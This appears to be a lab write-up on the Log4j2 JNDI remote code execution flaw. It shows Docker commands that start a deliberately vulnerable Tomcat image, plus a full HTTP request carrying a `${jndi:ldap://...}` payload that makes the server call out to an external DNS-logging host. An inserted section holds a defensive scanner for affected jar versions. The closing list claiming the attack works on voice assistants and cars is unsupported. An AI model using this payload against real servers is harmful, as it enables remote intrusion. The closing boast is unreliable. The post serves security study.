Log4j2 RCE Vulnerability and Lab Setup

Vulnerability Overview

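Apache Log4j2 is a Java logging framework and the successor to Log4j. It lets you control the output format of every log entry, and by assigning a level to each log message it gives finer control over how logs are generated. The vulnerability exists because certain Apache Log4j2 features perform recursive parsing. An attacker can exploit this without authorization by crafting malicious data to carry out a remote code execution attack and ultimately obtain the highest privileges on the server.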

Apache Log4j2 versions currently affected:
2.0 ≤ Apache Log4j ≤ 2.14.1
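
A defender-side check for the version range above, added here as an example that is not part of the original post: it walks a directory, opens every jar/war/ear (including archives nested inside a WAR) and reports each log4j-core copy whose version falls in the stated range. The function names and the sample archives are hypothetical and constructed; it assumes each jar still carries its Maven `pom.properties` metadata and that pre-release suffixes can be ignored.

```python
import io, re, tempfile, zipfile
from pathlib import Path

LOW, HIGH = (2, 0, 0), (2, 14, 1)  # affected range as stated on this page
# Assumption: the jar still carries its Maven metadata (repackaged jars may not).
POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear")

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a suffix such as '-beta9' is ignored (assumption)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None

def scan_archive(data, label, findings):
    """Inspect one archive held in memory, then recurse into archives nested in it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a readable zip: nothing to report
    with zf:
        if POM in zf.namelist():
            m = re.search(r"^version=(.+)$", zf.read(POM).decode("utf-8", "replace"), re.M)
            version = parse_version(m[1].strip()) if m else None
            findings.append((label, version, version is not None and LOW <= version <= HIGH))
        for name in zf.namelist():
            if name.lower().endswith(ARCHIVES):
                scan_archive(zf.read(name), f"{label}!{name}", findings)

def scan_tree(root):  # -> [(location, version, affected)] for each log4j-core copy
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            scan_archive(path.read_bytes(), str(path), findings)
    return findings

def fake_jar(entries):
    """Constructed sample: build an in-memory zip from {entry name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

def demo():  # constructed tree: one loose jar, one WAR bundling another copy
    core = lambda v: fake_jar({POM: f"version={v}\n"})
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "a.jar").write_bytes(core("2.14.1"))
        Path(tmp, "b.war").write_bytes(fake_jar({"WEB-INF/lib/log4j-core.jar": core("2.17.1")}))
        return [(Path(loc.split("!")[0]).name, ver, hit) for loc, ver, hit in scan_tree(tmp)]
```

Calling `scan_tree()` on a Tomcat `webapps` directory lists each location as `path!nested/entry`, so a copy bundled inside a WAR is reported together with the archive that contains it.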

Reproducing the Vulnerability

Before pulling the image to reproduce the issue, make sure the virtual machine is not in a suspended state!

Thanks to Fengxuan for patiently answering my questions.

┌──(rootguiltyfet)-[/home/guiltyfet]
└─# docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
Using default tag: latest
latest: Pulling from fengxuan/log4j_vuln
Digest: sha256:d929cad3243483f2f3cec6b7281a02873d9e6661dc00b5f0313429c04912d71d
Status: Image is up to date for registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest
registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest

┌──(rootguiltyfet)-[/home/guiltyfet]
└─# docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
8b707e3bc843cc4adc64b97a7237bf887ff6b31d5156d66a930b6b8861138a9b
                                                                                                 
┌──(rootguiltyfet)-[/home/guiltyfet]
└─# docker exec -it log4j_vuln_container /bin/bash
[root@8b707e3bc843 ansible]# /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
Using CATALINA_BASE:   /home/apache-tomcat-8.5.45
Using CATALINA_HOME:   /home/apache-tomcat-8.5.45
Using CATALINA_TMPDIR: /home/apache-tomcat-8.5.45/temp
Using JRE_HOME:        /usr/local/jdk1.8.0_144/
Using CLASSPATH:       /home/apache-tomcat-8.5.45/bin/bootstrap.jar:/home/apache-tomcat-8.5.45/bin/tomcat-juli.jar
Tomcat started.
[root@8b707e3bc843 ansible]# 


http://127.0.0.1:8080/webstudy/hello-fengxuan

Change the default port for Burp and SwitchyOmega.

POST /webstudy/hello-fengxuan HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; private_content_version=e48e945c4e066c5afa30b51edd7c4541; pma_lang=en; pma_collation_connection=utf8_unicode_ci
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

c=${jndi:ldap://bb772939.dns.1433.eu.org}


It works on everything

1. Voice assistants
2. Phone home screen
3. A certain Bluetooth device
4. A certain car
And so…
